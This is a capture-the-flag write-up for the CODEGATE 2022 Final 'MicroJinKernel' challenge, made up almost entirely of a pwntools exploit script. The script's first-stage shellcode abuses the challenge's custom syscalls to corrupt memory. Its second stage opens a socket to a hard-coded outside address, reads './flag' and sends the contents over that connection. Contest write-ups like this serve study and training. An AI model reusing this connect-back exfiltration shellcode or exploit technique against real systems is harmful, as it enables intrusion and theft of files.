CODEGATE 2022 Final – MicroJinKernel WriteUp

Exploit Code:

from pwn import *

# pwntools target configuration. The local `process` line is commented out,
# so as written this script only talks to the remote challenge instance.
# log_level='debug' makes pwntools hexdump every byte sent and received.
context(arch='amd64', os='linux', log_level='debug')
#p = process('./microjinkernel', aslr=True)
p = remote('52.78.196.197', 7483)

# Stage 1: assembled with asm() below and placed at the start of the
# 0x1000-byte buffer that is sent at the 'code > ' prompt.
# - The three rip-relative `lea`s at the top appear to point into the
#   `payload` region appended after the 0x200-byte pad (see the layout
#   below), so their displacements are tied to the exact assembled length
#   of this stub; editing instructions above them shifts those targets.
# - The cus_* labels are thin wrappers around challenge-specific syscall
#   numbers 0x10001..0x10007. These are not Linux syscall numbers; their
#   semantics belong to the challenge kernel and are not described on this
#   page (the author's note says an explanation is to follow).
# - The absolute addresses and the add/sub constants applied before the
#   cus_vuln / cus_write_vm / cus_read_vm calls are likewise
#   challenge-specific values; the page does not explain how they were
#   derived, so do not read them as generic offsets.
shellcode = '''
    lea r8, [rip+0x1f9]
    lea r9, [rip+0x210]
    lea r11, [rip+0x227]
    mov rbp, rsp
    sub rsp, 0x208
    mov rdi, r8
    mov rsi, 0x10
    call cus_open
    mov rdi, r9
    mov rsi, 0x10
    call cus_open
    mov rdi, 0
    mov rsi, 0xf
    call cus_init
    mov rdi, 1
    mov rsi, 0x1000
    call cus_init
    mov rdi, 1
    call cus_close
    mov r10, 0x11017e8
    mov QWORD PTR [r10], 1
    add r10, 8
    mov QWORD PTR [r10], 0x38273
    add r10, 8
    mov QWORD PTR [r10], 1
    mov rdi, 0x1100000
    mov rsi, 0xff
    call cus_vuln
    mov rdi, 0xffffffff00000000
    mov rsi, 0x20
    mov rdx, 0x18
    mov rcx, 0x1100000
    call cus_write_vm
    mov r10, 0x1100000
    sub QWORD PTR [r10], 0x360
    sub QWORD PTR [r10+0x10], 0x3e50
    add QWORD PTR [r10+0x10], 0xcd70
    mov rsi, QWORD PTR [r10]
    sub rsi, QWORD PTR [r10+0x10]
    add rsi, 0x1f6b
    mov rdi, 0xffffffff00000000
    mov rdx, 0x600
    mov rcx, r11
    call cus_read_vm
cus_open:
    mov rax, 0x10001
    syscall
    ret
cus_init:
    mov rax, 0x10002
    syscall
    ret
cus_close:
    mov rax, 0x10003
    syscall
    ret
cus_read_vm:
    mov rax, 0x10004
    syscall
    ret
cus_write_vm:
    mov rax, 0x10005
    syscall
    ret
read_or_write:
    mov rax, 0x10006
    syscall
    ret
cus_vuln:
    mov rax, 0x10007
    syscall
    ret
'''
# open socket, connect, open flag, read flag, write socket
# Stage 2 uses ordinary Linux x86-64 syscall numbers (0x29 socket,
# 0x2a connect, 2 open, 0 read, 1 write). Both the connect-back sockaddr
# and the flag path are hard-coded immediates pushed onto the stack.
# Where and how this stage ends up executing is not explained on the page.
# From a detection standpoint, the observable behaviour is a fresh outbound
# TCP connection immediately followed by a file read whose contents are
# written to that socket.
shellcode2 = '''
    mov rdi, 2
    mov rsi, 1
    mov rdx, 0
    mov rax, 0x29
    syscall
    mov r8, rax
    mov rdi, rax
    mov rdx, 0x10
    mov rax, 0
    push rax
    mov rax, 0xe296260e401f0002
    push rax
    mov rsi, rsp
    mov rax, 0x2a
    syscall
    mov rax, 0x67616c662f2e 
    push rax
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 2
    syscall
    mov rdi, rax
    mov rsi, rsp
    sub rsi, 0x70
    mov rdx, 0x70
    mov rax, 0x0
    syscall
    mov rdi, r8
    mov rax, 0x1
    syscall
'''
shellcode = asm(shellcode)
shellcode2 = asm(shellcode2)
# NOTE: the str fill values and str + asm() concatenation below only work
# with Python 2 pwntools, where asm() returns str. Under Python 3 asm()
# returns bytes and bytes.ljust(0x200, "\x90") raises TypeError.
shellcode = shellcode.ljust(0x200, "\x90")
# Buffer layout from offset 0x200: two NUL-padded 0x1e-byte path strings,
# a NOP sled, stage 2, then trailing NOPs.
payload = '/tmp/test' + "\x00"*21 + '/tmp/booo' + "\x00"*21 + '\x90'*0x105 + shellcode2 + '\x90'*0x100
# `payload` is already longer than 0x100 bytes at this point, so this
# ljust is a no-op (kept as in the original).
payload = payload.ljust(0x100, "\x00")
shellcode = shellcode + payload
# The buffer sent at the prompt is exactly 0x1000 bytes.
shellcode = shellcode.ljust(0x1000, "\x00")

pause()  # wait for a keypress before sending (e.g. to attach a debugger)
p.sendafter('code > ', shellcode)

p.interactive()

설명 추후 추가 예정
